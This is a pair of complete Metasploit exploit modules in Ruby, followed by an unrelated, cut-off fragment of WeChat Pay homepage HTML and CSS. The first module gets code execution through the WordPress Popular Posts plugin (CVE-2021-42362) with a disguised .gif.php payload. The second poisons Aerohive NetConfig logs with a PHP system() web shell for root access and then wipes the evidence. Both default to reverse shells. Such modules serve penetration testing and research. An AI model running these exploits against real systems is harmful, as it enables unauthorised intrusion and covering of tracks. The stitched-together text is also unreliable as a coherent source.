### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend

<html><head> <meta name="baidu-site-verification" content="1jPmULtLtZ"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=9"> <title>微信支付 - 中国领先的第三方支付平台 ｜ 微信支付提供安全快捷的支付方式</title> <meta name="keywords" content="微信支付,微信,支付,移动支付,手机支付,微支付,微信支付开通,微信支付接入,微信支付申请,微信支付官网,微信支付商户平台,微信支付接口开发,微信支付接口申请,微信支付客服,微信支付登录"> <meta name="description" content="微信支付是腾讯公司的支付业务品牌，微信支付提供公众号支付、APP支付、扫码支付、刷卡支付等支付方式。微信支付结合微信公众账号，全面打通O2O生活消费领域，提供专业的互联网+行业解决方案，微信支付支持微信红包和微信理财通，是移动支付的首选。"> <link rel="shortcut icon" href="https://wx.gtimg.com/core/favicon.ico" type="image/x-icon"> <style> body,ol,ul,h1,h2,h3,h4,h5,h6,p{margin:0;padding:0;} body{min-width:1200px;font:14px "Helvetica Neue","Hiragino Sans GB","Microsoft YaHei","\9ED1\4F53",Arial,sans-serif;background:#fff;-webkit-text-size-adjust:100%;color:#222;} a{color:#459ae9;text-decoration:none;} a:hover{color:#459ae9;text-decoration:underline;} i,em{font-style:normal;} strong{font-weight:normal;} li{list-style:none;} img{border:0;vertical-align:middle;} table{border-collapse:collapse;border-spacing:0;} .hide{display:none;} .red{color:#ff0000;} .login-form label,.cbx,.guide-main-li-ico,.warn,.ico-new,.ico-right{background:url(https://wx.gtimg.com/pay/img/home/base.png?v=20160112) no-repeat;} .clr:after{content:".";clear:both;display:block;height:0;visibility:hidden;} .clr{zoom:1;} .hide{display:none;} .vs{margin:0 10px;font-family:arial;color:#ccc;} .cbx{width:16px;height:16px;display:inline-block;margin:-3px 6px 0 0;*margin-top:0;vertical-align:middle;cursor:pointer;overflow:hidden;} .cbx{background-position:0 -54px;} .cbx-on{background-position:0 -80px;display:inline-block;} .wrap{width:1025px;margin:0 auto;overflow:hidden;zoom:1;} .container{margin:25px auto;} .topbar{height:33px;line-height:33px;color:#999;background:#f6f6f6;border-bottom:1px solid #dcdcdc;font:12px/33px tahoma,arial,"Hiragino Sans GB",\5B8B\4F53,sans-serif;} .topbar a{color:#00c901;} .header{position:relative;z-index:99;background-color:#fff;/*border-top:4px solid #44b549;*/border-bottom:1px solid #d9dadc;} .header .wrap{height:60px;position:relative;overflow:visible;z-index:999} .header .logo{float:left;width:232px;overflow:hidden;} .header .logo a{display:block;height:40px;margin-top:12px;text-indent:-999px;background:url(https://wx.gtimg.com/pay/img/common/logo.png?v=20160114) no-repeat} .header .link{float:right;line-height:60px;} .header .link a{color:#222;} .header .link a:hover{color:#459ae9} .header .pole-msg{display:inline-block;*display:inline;position:relative;} .header .pole-msg a.content-us{display:inline-block;width:75px;height:60px;position:relative;z-index:9;} .header .pole-msg a.content-us:hover{color:#222;text-decoration:none;} .header .pole-msg.show-popup a.content-us{background:#fff;border-left:1px solid #e7e7eb;border-right:1px solid #e7e7eb;padding-left:16px;margin:0 -1px 0 -17px;*left:-17px;} .header .popup{display:none;position:absolute;top:59px;left:-97px;border:1px solid #e7e7eb;z-index:8;width:131px;} .header .show-popup .popup{display:block;line-height:26px;padding:14px 20px;background:#fff;} .header .show-popup .popup p{font-size:12px;color:#999} .header .show-popup .popup p.tel{color:#333333;font-size:17px;} .header .show-popup .popup .bor-top{border-top:1px solid #e7e7eb;margin-top:10px;padding-top:10px;} .header .dropdown-arrow{position:absolute;right:6px;top:29px;border-color:#c2c2c2 transparent transparent;border-style:solid dashed dashed;border-width:4px 4px 0;font-size:0;height:0;width:0;line-height:0;} .header .show-popup .dropdown-arrow{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg);-webkit-transition:all .25s ease 0s;-moz-transition:all .25s ease 0s;-o-transition:all .25s ease 0s;transition:all .25s ease 0s;} .footer{text-align:center;padding-bottom:20px;color:#999999;font:12px/1.6 tahoma,arial,"Hiragino Sans GB",\5B8B\4F53,sans-serif;} .footer p{margin-bottom:8px;} .footer a{color:#999999;} .footer a:hover{color:#459ae9} .banner{height:410px;position:relative;} .banner .wrap-login{position:relative;z-index:2;} .banner .login{float:right;width:314px;margin-top:20px;padding:15px 15px 20px;background:rgba(255,255,255,0.8);position:static;border:1px solid #fff;} @media \0screen\,screen\9{ .banner .login{background:#fff;filter:alpha(opacity=80);*zoom:1;position:static;} .banner .login .login-in{position:relative;} } .banner .login h2{margin-bottom:5px;font-size:20px;font-weight:400;} .banner .login h2 strong{display:none;} .banner .login a{color:#333} .banner .login a:hover{color:#459ae9} .banner .login .tips-error a,.banner .login .tips-warn a{color:#459ae9} .banner .login .tips-error{line-height:24px;font-size:13px;} .banner .login .tips-warn .warn{float:left;width:16px;height:16px;background-position:-24px 0;margin-top:4px;} .banner .login .tips-warn p{float:right;color:#b29b4a;width:290px;font-size:13px;line-height:24px} .banner .login-form .login-mainly{margin-top:10px;margin-bottom:10px;} .banner .login-form .login-account,.banner .login-form .login-password{height:42px;line-height:42px;padding:3px 0;background:#fff;border-left:1px solid #cecece;border-top:1px solid #cecece;position:relative;padding-left:54px;} .banner .login-form label{width:20px;height:20px;overflow:hidden;text-indent:-999px;position:absolute;left:20px;top:30%} .banner .login-form input{width:100%;padding:11px 0;border:0;box-shadow:0;outline:0;vertical-align:middle;font-family:"Microsoft YaHei";font-size:14px;} .banner .login-form .ico-account{background-position:0 0;} .banner .login-form .ico-password{background-position:0 -26px;} .banner .login-form .login-password{margin-top:10px;} .banner .login-password-on .login-account{border-bottom:none;} .banner .login-verify{margin-bottom:10px;height:38px;} .banner .login-verify input{width:100px;padding:10px;vertical-align:middle;vertical-align:middle;border-left:1px solid #cecece;border-top:1px solid #cecece;} .banner .login-verify input:focus{border-left:1px solid #cecece;border-top:1px solid #cecece;} .banner .login-verify .img-verify{width:100px;height:40px;margin:0 11px;vertical-align:middle;} .banner .login-memory{margin-bottom:20px;overflow:hidden;zoom:1;} .banner .login-memory .memory-account{float:left;} .banner .login-memory .forget-password{float:right;} .banner .login .btn-login{display:inline-block;width:100%;height:45px;line-height:45px;background-color:#00c800;color:#fff;border:1px solid #44b549;text-align:center;font-size:20px;} .banner .login .btn-login:hover{text-decoration:none;background:#2F9833;color:#fff;} .guide-main-li-ico{display:inline-block;width:73px;height:57px;} .ico-mp{background-position:2px -159px;} .ico-app{background-position:8px -366px;} .ico-code{background-position:4px -230px;} .ico-shuaka{background-position:8px -294px;} /*最新公告*/ .cms-notice{margin:5px 0 -7px;position:relative;} .cms-notice h2,.cms-notice ul,.cms-notice p{display:inline-block;line-height:20px;} .cms-notice h2{float:left;background:#595B5B;color:#fff;font-size:14px;padding:0px 4px;} .cms-notice li{float:left;margin-left:18px;width:275px;} .cms-notice a{color:#222} .cms-notice a:hover{color:#459ae9} .cms-notice li span.time{float:left;color:#999;margin-right:5px;} .cms-notice li a{display:inline-block;max-width:205px;_width:205px;height:21px;white-space:nowrap;overflow-x:hidden;text-overflow:ellipsis;} .cms-notice p{float:right;} .cms-notice p a{color:#222;} .cms-notice li .ico-new{position:absolute;display:inline-block;width:17px;height:9px;margin-left:5px;background:url(https://wx.gtimg.com/mch/img/ico-new.png);} .cms-notice .more{position:absolute;top:0;right:0;} .cms-notice .more .ico-right{display:inline-block;width:11px;height:9px;margin:0 0 0 3px;vertical-align:middle;background-position:-4px -135px;} /*四大支付方式*/ .title{margin-top:45px;} .title h2,.title .line,.title .pay-btn{display:inline-block;} .title h2{font-size:20px;font-weight:normal;color:#333;background:#fff;position:absolute;margin-top:-15px;padding-right:10px;} .title .pay-btn{position:absolute;right:0;margin-top:-14px;background:#fff;padding-left:5px;} .title .pay-btn a{display:block;border:1px solid #3e3a39;padding:2px 5px 2px 17px;color:#333333;} .title .pay-btn a:hover{text-decoration:none} .through{height:326px;margin-top:20px;padding-bottom:35px;border-bottom:1px dotted #ccc;background:url(https://wx.gtimg.com/pay/img/home/qrcode.png?v=20150602) center top no-repeat;} .through li{font-size:16px;margin-top:58px;margin-left:68px;position:absolute;} .through li.l02{margin-top:143px;} .through li.l03{margin-top:228px;} .through li.l04{margin-left:748px;} .through 